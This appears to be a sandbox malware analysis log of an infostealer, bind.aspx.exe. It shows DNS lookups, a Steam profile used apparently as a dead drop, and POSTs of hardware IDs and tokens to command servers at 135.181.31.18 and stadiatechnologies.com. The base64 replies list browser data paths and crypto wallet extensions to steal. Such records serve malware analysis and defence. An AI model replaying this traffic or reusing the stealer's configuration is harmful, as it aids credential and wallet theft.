Sep 28, 2024 03:29:57.077841043 CEST | 49720 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:57.077884912 CEST | 49720 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:57.078733921 CEST | 49720 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:57.078753948 CEST | 443 | 49720 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.028570890 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.028616905 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.028682947 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.038377047 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.038395882 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.709489107 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.709651947 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.710252047 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.710283041 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.712260962 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.712277889 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.712342024 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.712368965 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.712393045 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.712403059 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.712471962 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.712507010 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.712522984 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.712538004 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.712672949 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.712712049 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.712732077 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.712732077 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.712755919 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.712766886 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.712826014 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.712851048 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:29:58.712882996 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:29:58.712902069 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:30:00.156095982 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:30:00.156178951 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:30:00.156244040 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:30:00.156289101 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:30:00.156316042 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:30:00.156342983 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:30:00.156435966 CEST | 49721 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:30:00.156459093 CEST | 443 | 49721 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:30:00.203535080 CEST | 49722 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:30:00.203598022 CEST | 443 | 49722 | 135.181.31.18 | 192.168.2.7
Sep 28, 2024 03:30:00.203696966 CEST | 49722 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:30:00.203989983 CEST | 49722 | 443 | 192.168.2.7 | 135.181.31.18
Sep 28, 2024 03:30:00.204019070 CEST | 443 | 49722 | 135.181.31.18 | 192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:00.892811060 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:00.892970085 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.914788008 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.914853096 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:00.917052984 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.917069912 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:01.661823034 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:01.661905050 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:01.661917925 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.661987066 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.903173923 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.903203964 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:01.906142950 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.906196117 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:01.906254053 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.906635046 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.906652927 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:02.576697111 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:02.576776981 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:02.577234030 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:02.577244997 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:02.578916073 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:02.578922033 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.337654114 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.337735891 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.337852955 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:03.338031054 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:03.338056087 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.658917904 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:03.663894892 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.666065931 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:03.666202068 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:03.666256905 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:03.671030998 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.671103001 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.671287060 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.671317101 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:05.276869059 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:05.277004957 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:05.320214987 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:05.325122118 CEST804972595.164.119.162192.168.2.7
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Sep 28, 2024 03:29:38.538948059 CEST  62658        53         192.168.2.7  1.1.1.1
Sep 28, 2024 03:29:38.547130108 CEST  53           62658      1.1.1.1      192.168.2.7
Sep 28, 2024 03:30:03.355609894 CEST  57740        53         192.168.2.7  1.1.1.1
Sep 28, 2024 03:30:03.655246019 CEST  53           57740      1.1.1.1      192.168.2.7
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                    Type            Class        DNS over HTTPS
Sep 28, 2024 03:29:38.538948059 CEST  192.168.2.7  1.1.1.1  0x112a    Standard query (0)  steamcommunity.com      A (IP address)  IN (0x0001)  false
Sep 28, 2024 03:30:03.355609894 CEST  192.168.2.7  1.1.1.1  0x5984    Standard query (0)  stadiatechnologies.com  A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                    CName  Address         Type            Class        DNS over HTTPS
Sep 28, 2024 03:29:38.547130108 CEST  1.1.1.1    192.168.2.7  0x112a    No error (0)  steamcommunity.com      -      104.102.49.254  A (IP address)  IN (0x0001)  false
Sep 28, 2024 03:30:03.655246019 CEST  1.1.1.1    192.168.2.7  0x5984    No error (0)  stadiatechnologies.com  -      95.164.119.162  A (IP address)  IN (0x0001)  false
• steamcommunity.com
• 135.181.31.18
• stadiatechnologies.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49725        95.164.119.162  80                6376  C:\Users\user\Desktop\bind.aspx.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 28, 2024 03:30:03.666202068 CEST  315                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: stadiatechnologies.com
Content-Length: 2653
Connection: Keep-Alive
Cache-Control: no-cache
Sep 28, 2024 03:30:03.666256905 CEST  2653               OUT        Data Ascii: ------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------JEGDGIIJJECFID


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49708        104.102.49.254  443               6376  C:\Users\user\Desktop\bind.aspx.exe
Timestamp                Bytes transferred  Direction  Data
2024-09-28 01:29:39 UTC  119                OUT        GET /profiles/76561199761128941 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-28 01:29:39 UTC  1870               IN         HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sat, 28 Sep 2024 01:29:39 GMT
Content-Length: 34730
Connection: close
Set-Cookie: sessionid=ae1ed4a2010bbff990dabe0d; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-28 01:29:39 UTC  14514              IN         Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-28 01:29:39 UTC  16384              IN         Data Ascii: yWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role
2024-09-28 01:29:39 UTC  3768               IN         Data Ascii: nActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div>
2024-09-28 01:29:39 UTC  64                 IN         Data Ascii: t --></div>... responsive_page_frame --></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.7  49709        135.181.31.18   443               6376  C:\Users\user\Desktop\bind.aspx.exe
Timestamp                Bytes transferred  Direction  Data
2024-09-28 01:29:40 UTC  213                OUT        GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 135.181.31.18
Connection: Keep-Alive
Cache-Control: no-cache
2024-09-28 01:29:41 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Sep 2024 01:29:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-09-28 01:29:41 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49710 | 135.181.31.18 | 443 | 6376 | C:\Users\user\Desktop\bind.aspx.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-28 01:29:42 UTC | 305 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
    Host: 135.181.31.18
    Content-Length: 256
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-09-28 01:29:42 UTC | 256 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 44 41 39 42 44 41 30 42 30 44 32 38 36 35 38 36 36 33 30 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 2d 2d 0d
    Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="hwid"A2DA9BDA0B0D2865866309-a33c7340-61ca------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------AEGIJKEHCAKFCAKFHDAA--
2024-09-28 01:29:43 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 28 Sep 2024 01:29:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-09-28 01:29:43 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 3a1|1|1|1|3108c7c2bf1f0ac4d3c5bcc0d28a8c50|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49711 | 135.181.31.18 | 443 | 6376 | C:\Users\user\Desktop\bind.aspx.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-28 01:29:43 UTC | 305 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
    Host: 135.181.31.18
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-09-28 01:29:43 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74
    Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------DHCAAEBKEGHJKEBFHJDBCont
2024-09-28 01:29:44 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 28 Sep 2024 01:29:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-09-28 01:29:44 UTC | 1564 | IN | Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
    Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49712 | 135.181.31.18 | 443 | 6376 | C:\Users\user\Desktop\bind.aspx.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-28 01:29:45 UTC | 305 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHC
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
    Host: 135.181.31.18
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-09-28 01:29:45 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74
    Data Ascii: ------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------GDGHIDBKJEGIECBGIEHCCont
2024-09-28 01:29:46 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 28 Sep 2024 01:29:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-09-28 01:29:46 UTC | 5685 | IN | Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
    Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49713 | 135.181.31.18 | 443 | 6376 | C:\Users\user\Desktop\bind.aspx.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-28 01:29:46 UTC | 305 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
    Host: 135.181.31.18
    Content-Length: 332
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-09-28 01:29:46 UTC | 332 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74
    Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------JKEHIIJJECFHJKECFHDGCont
2024-09-28 01:29:47 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 28 Sep 2024 01:29:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-09-28 01:29:47 UTC | 119 | IN | Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49714 | 135.181.31.18 | 443 | 6376 | C:\Users\user\Desktop\bind.aspx.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-28 01:29:48 UTC | 306 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
    Host: 135.181.31.18
    Content-Length: 8197
